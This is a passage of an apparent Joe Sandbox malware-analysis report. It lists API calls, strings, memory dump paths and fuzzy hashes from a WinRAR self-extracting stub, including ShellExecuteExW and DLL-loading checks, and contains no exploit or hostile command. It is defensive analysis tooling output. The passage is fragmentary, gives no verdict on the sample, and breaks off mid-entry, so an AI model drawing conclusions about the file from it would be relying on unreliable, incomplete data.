                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6F2
                                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6FE
                                                                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A728
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0090A592,000000FF,?,?), ref: 0090A734
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 42610566-0
                                                                                                  • Opcode ID: 70b49415db65ee759d86d4b6537f80750f957a2ed6dd7650406130fa253d28dc
                                                                                                  • Instruction ID: 56499426b39a628383a4d95c5af231ff484c0525e5e3a58028ea2a87713db97c
                                                                                                  • Opcode Fuzzy Hash: 70b49415db65ee759d86d4b6537f80750f957a2ed6dd7650406130fa253d28dc
                                                                                                  • Instruction Fuzzy Hash: 37414F72900619AFCB25DF68CC84AE9B7B8FB48350F148196F959D3250D7346E94DF90
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00927DC4,00000000,0093C300,0000000C,00927F1B,00000000,00000002,00000000), ref: 00927E0F
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00927DC4,00000000,0093C300,0000000C,00927F1B,00000000,00000002,00000000), ref: 00927E16
                                                                                                  • ExitProcess.KERNEL32 ref: 00927E28
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 400971564aa4f00eeb234eaae5975060eba7d4ed8a44dd2908a7fe3e47c9d148
                                                                                                  • Instruction ID: 4a6e9b98f6cdfb343f1b1eec1c1a768d03602ed12d5d2392ac4fe61da0ce02aa
                                                                                                  • Opcode Fuzzy Hash: 400971564aa4f00eeb234eaae5975060eba7d4ed8a44dd2908a7fe3e47c9d148
                                                                                                  • Instruction Fuzzy Hash: 5EE04F31058154ABCF016F90ED09A497F6AEB40341B018454F8059A136CB35DE51EB90
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 7238da1d00c6267e0adf52f86660e28343b209fcce57cde7b50ab9f598c8f422
                                                                                                  • Instruction ID: 51bdd6cc7aaca24522a6c989bfcf1781798ec0aaea6cbf2c0c281d4e825fcf9d
                                                                                                  • Opcode Fuzzy Hash: 7238da1d00c6267e0adf52f86660e28343b209fcce57cde7b50ab9f598c8f422
                                                                                                  • Instruction Fuzzy Hash: 4D820A71A04245AEDF15DB64C895BFBBBBDAF45300F0841B9E8D99B2C3DB315A84CB60
APIs
• __EH_prolog.LIBCMT ref: 0091B7E5
  • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
  • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091B8D1
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B8EF
• IsDialogMessageW.USER32(?,?), ref: 0091B902
• TranslateMessage.USER32(?), ref: 0091B910
• DispatchMessageW.USER32(?), ref: 0091B91A
• GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0091B93D
• KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0091B960
• GetDlgItem.USER32(?,00000068), ref: 0091B983
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0091B99E
• SendMessageW.USER32(00000000,000000C2,00000000,009335F4), ref: 0091B9B1
  • Part of subcall function 0091D453: _wcslen.LIBCMT ref: 0091D47D
• SetFocus.USER32(00000000), ref: 0091B9B8
• _swprintf.LIBCMT ref: 0091BA24
  • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
  • Part of subcall function 0091D4D4: GetDlgItem.USER32(00000068,0095FCB8), ref: 0091D4E8
  • Part of subcall function 0091D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0091AF07,00000001,?,?,0091B7B9,0093506C,0095FCB8,0095FCB8,00001000,00000000,00000000), ref: 0091D510
  • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0091D51B
  • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000C2,00000000,009335F4), ref: 0091D529
  • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0091D53F
  • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0091D559
  • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0091D59D
  • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0091D5AB
  • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0091D5BA
  • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0091D5E1
  • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000C2,00000000,009343F4), ref: 0091D5F0
• GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0091BA68
• GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0091BA90
• GetTickCount.KERNEL32 ref: 0091BAAE
• _swprintf.LIBCMT ref: 0091BAC2
• GetLastError.KERNEL32(?,00000011), ref: 0091BAF4
• GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0091BB43
• _swprintf.LIBCMT ref: 0091BB7C
• CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0091BBD0
• GetCommandLineW.KERNEL32 ref: 0091BBEA
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0091BC47
• ShellExecuteExW.SHELL32(0000003C), ref: 0091BC6F
• Sleep.KERNEL32(00000064), ref: 0091BCB9
• UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0091BCE2
• CloseHandle.KERNEL32(00000000), ref: 0091BCEB
• _swprintf.LIBCMT ref: 0091BD1E
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091BD7D
• SetDlgItemTextW.USER32(?,00000065,009335F4), ref: 0091BD94
• GetDlgItem.USER32(?,00000065), ref: 0091BD9D
• GetWindowLongW.USER32(00000000,000000F0), ref: 0091BDAC
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0091BDBB
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091BE68
• _wcslen.LIBCMT ref: 0091BEBE
• _swprintf.LIBCMT ref: 0091BEE8
• SendMessageW.USER32(?,00000080,00000001,?), ref: 0091BF32
• SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0091BF4C
• GetDlgItem.USER32(?,00000068), ref: 0091BF55
• SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0091BF6B
• GetDlgItem.USER32(?,00000066), ref: 0091BF85
• SetWindowTextW.USER32(00000000,0094A472), ref: 0091BFA7
• SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0091C007
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091C01A
• DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0091C0BD
• EnableWindow.USER32(00000000,00000000), ref: 0091C197
• SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0091C1D9
  • Part of subcall function 0091C73F: __EH_prolog.LIBCMT ref: 0091C744
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091C1FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
• String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
• API String ID: 3445078344-2238251102
• Opcode ID: ec0be37e8b367f2aae119cdc1ac9ff43ec2a3afeb80166228c27c1e928ef646a
• Instruction ID: adee4c5c1bc9c0429996f1c0f49749abca1f56e345e63bf461a359fe45750812
• Opcode Fuzzy Hash: ec0be37e8b367f2aae119cdc1ac9ff43ec2a3afeb80166228c27c1e928ef646a
• Instruction Fuzzy Hash: C242E8B1A9824CBEEB219B70DD4AFFE377D9B42700F044059F644A60E2CBB55E84DB61

Control-flow Graph
• Function starting at 00910863 (legend: Executed / Not Executed); the graph rendering is not reproduced here, the basic blocks referenced are the API call sites listed below.
APIs
• GetModuleHandleW.KERNEL32(kernel32), ref: 0091087C
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0091088E
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009108BF
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00910B69
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00910B83
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00910B93
• ReadFile.KERNEL32(00000000,?,00007FFE,00933C7C,00000000), ref: 00910BB1
• CloseHandle.KERNEL32(00000000), ref: 00910C09
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00910C1E
• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00933C7C,?,00000000,?,00000800), ref: 00910C72
• GetFileAttributesW.KERNELBASE(?,?,00933C7C,00000800,?,00000000,?,00000800), ref: 00910C9C
• GetFileAttributesW.KERNEL32(?,?,00933D44,00000800), ref: 00910CD8
  • Part of subcall function 0091081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00910836
  • Part of subcall function 0091081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0090F2D8,Crypt32.dll,00000000,0090F35C,?,?,0090F33E,?,?,?), ref: 00910858
• _swprintf.LIBCMT ref: 00910D4A
• _swprintf.LIBCMT ref: 00910D96
  • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
• AllocConsole.KERNEL32 ref: 00910D9E
• GetCurrentProcessId.KERNEL32 ref: 00910DA8
• AttachConsole.KERNEL32(00000000), ref: 00910DAF
• _wcslen.LIBCMT ref: 00910DC4
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00910DD5
• WriteConsoleW.KERNEL32(00000000), ref: 00910DDC
• Sleep.KERNEL32(00002710), ref: 00910DE7
• FreeConsole.KERNEL32 ref: 00910DED
• ExitProcess.KERNEL32 ref: 00910DF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
• API String ID: 1207345701-3298887752
• Opcode ID: 7a290c9895e00cb5a3dc4df38446a56b454a0635edbc61b414c280373b1e67ae
• Instruction ID: e9f412e517c5e4bfebb6cedea0df8ff0711e62ae087ac4fde7ac65dcff926f4c
• Opcode Fuzzy Hash: 7a290c9895e00cb5a3dc4df38446a56b454a0635edbc61b414c280373b1e67ae
• Instruction Fuzzy Hash: E6D181B1188384AFD3309F50C849BDFBAECBBC5704F51891DF59996190CBB59688CFA2

Control-flow Graph
• Function starting at 0091C73F (legend: Executed / Not Executed); the graph rendering is not reproduced here, the basic blocks referenced are the API call sites listed below.
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0091C744
                                                                                                    • Part of subcall function 0091B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0091B3FB
                                                                                                  • _wcslen.LIBCMT ref: 0091CA0A
                                                                                                  • _wcslen.LIBCMT ref: 0091CA13
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0091CA71
                                                                                                  • _wcslen.LIBCMT ref: 0091CAB3
                                                                                                  • _wcsrchr.LIBVCRUNTIME ref: 0091CBFB
                                                                                                  • GetDlgItem.USER32(?,00000066), ref: 0091CC36
                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0091CC46
                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,0094A472), ref: 0091CC54
                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0091CC7F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                  • API String ID: 2804936435-312220925
                                                                                                  • Opcode ID: c16ebd39446c65ad34f2bef9c743f9620c74a579df58b165928008cf75ecf1dc
                                                                                                  • Instruction ID: eb0627ae6c6f36bcf87ffb9b00a35072b5e97b5755da4d068186e1d062bf60ad
                                                                                                  • Opcode Fuzzy Hash: c16ebd39446c65ad34f2bef9c743f9620c74a579df58b165928008cf75ecf1dc
                                                                                                  • Instruction Fuzzy Hash: 0BE164B2A4421DAADF25DBA0DD85EEE73BCAB44350F4084A5F649E3050EB749EC58F60
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0090DA70
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0090DAAC
                                                                                                    • Part of subcall function 0090C29A: _wcslen.LIBCMT ref: 0090C2A2
                                                                                                    • Part of subcall function 009105DA: _wcslen.LIBCMT ref: 009105E0
                                                                                                    • Part of subcall function 00911B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0090BAE9,00000000,?,?,?,00010464), ref: 00911BA0
                                                                                                  • _wcslen.LIBCMT ref: 0090DDE9
                                                                                                  • __fprintf_l.LIBCMT ref: 0090DF1C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                  • API String ID: 566448164-801612888
                                                                                                  • Opcode ID: 9b7a3f8e351c6cc45d079fd5b1bd08c410af3934a9c2f81d34633838b1c4ea06
                                                                                                  • Instruction ID: 976f27ca469ff1b18ffb954589c9979d163bfca05b8d19d535dc0c96eef280e9
                                                                                                  • Opcode Fuzzy Hash: 9b7a3f8e351c6cc45d079fd5b1bd08c410af3934a9c2f81d34633838b1c4ea06
                                                                                                  • Instruction Fuzzy Hash: 6F32DF72A04218EFDF24EFA8C841BEA77B9FF84700F40495AF945972C1E7B19985CB50

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 0091B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091B579
                                                                                                    • Part of subcall function 0091B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B58A
                                                                                                    • Part of subcall function 0091B568: IsDialogMessageW.USER32(00010464,?), ref: 0091B59E
                                                                                                    • Part of subcall function 0091B568: TranslateMessage.USER32(?), ref: 0091B5AC
                                                                                                    • Part of subcall function 0091B568: DispatchMessageW.USER32(?), ref: 0091B5B6
                                                                                                  • GetDlgItem.USER32(00000068,0095FCB8), ref: 0091D4E8
                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,0091AF07,00000001,?,?,0091B7B9,0093506C,0095FCB8,0095FCB8,00001000,00000000,00000000), ref: 0091D510
                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0091D51B
                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,009335F4), ref: 0091D529
                                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0091D53F
                                                                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0091D559
                                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0091D59D
                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0091D5AB
                                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0091D5BA
                                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0091D5E1
                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,009343F4), ref: 0091D5F0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                  • String ID: \
                                                                                                  • API String ID: 3569833718-2967466578
                                                                                                  • Opcode ID: 8769c787d51f5737c2d09592493eeab2e84f2f291791635f32146fa7a3b65a59
                                                                                                  • Instruction ID: 9badbfb785a59765e29a1f9829e2c8c63fe36954f3eba05fbcb1c72e2907c676
                                                                                                  • Opcode Fuzzy Hash: 8769c787d51f5737c2d09592493eeab2e84f2f291791635f32146fa7a3b65a59
                                                                                                  • Instruction Fuzzy Hash: 7531C171659346ABD301DF209C4AFAB7FACEB82704F00450CF951961A0DBB49A089B76

                                                                                                  Control-flow Graph (rendered graph omitted; basic blocks 91d78f-91d9f0 with executed/not-executed colouring, calling 91ec50, 923e13, 91fff0, 90b92d, 90a231, 911fbb, 90b6c4, 91dc3b and the APIs ShellExecuteExW, ShowWindow, CloseHandle, GetExitCodeProcess)
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 0091D7AE
                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0091D8DE
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0091D91D
                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0091D959
                                                                                                  • CloseHandle.KERNEL32(?), ref: 0091D97F
                                                                                                  • ShowWindow.USER32(?,00000001), ref: 0091D9E1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                  • String ID: .exe$.inf
                                                                                                  • API String ID: 36480843-3750412487
                                                                                                  • Opcode ID: d1f802a08c317611399af3aa0313641b38c887314b98d71a3169ec24a875c837
                                                                                                  • Instruction ID: a89a0f84e4753ec8aad4f3d51366bc85f425af98a9a08efca9713c4c34d65dcd
                                                                                                  • Opcode Fuzzy Hash: d1f802a08c317611399af3aa0313641b38c887314b98d71a3169ec24a875c837
                                                                                                  • Instruction Fuzzy Hash: 7051F67160A388AADB309F24D840BEBBBE8AF82744F04485DF5C1971A1D775CAC4DB52

                                                                                                  Control-flow Graph (rendered graph omitted; basic blocks 92a95b-92ab76 with executed/not-executed colouring, calling 92ef4c, 91fbbc, 932010, 928e06, 92af6c, 92abc3 and the APIs MultiByteToWideChar, WideCharToMultiByte)
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00925695,00925695,?,?,?,0092ABAC,00000001,00000001,2DE85006), ref: 0092A9B5
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0092ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0092AA3B
                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0092AB35
                                                                                                  • __freea.LIBCMT ref: 0092AB42
                                                                                                    • Part of subcall function 00928E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
                                                                                                  • __freea.LIBCMT ref: 0092AB4B
                                                                                                  • __freea.LIBCMT ref: 0092AB70
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1414292761-0
                                                                                                  • Opcode ID: 7da6a313feb345b697c645395a00a621c16b68ff6e7403c62b9f69181f6e2fc3
                                                                                                  • Instruction ID: 2a978731cd0ef2b2d827cbbf88c1e1315f030aa3153611cef28a9b20e92db0db
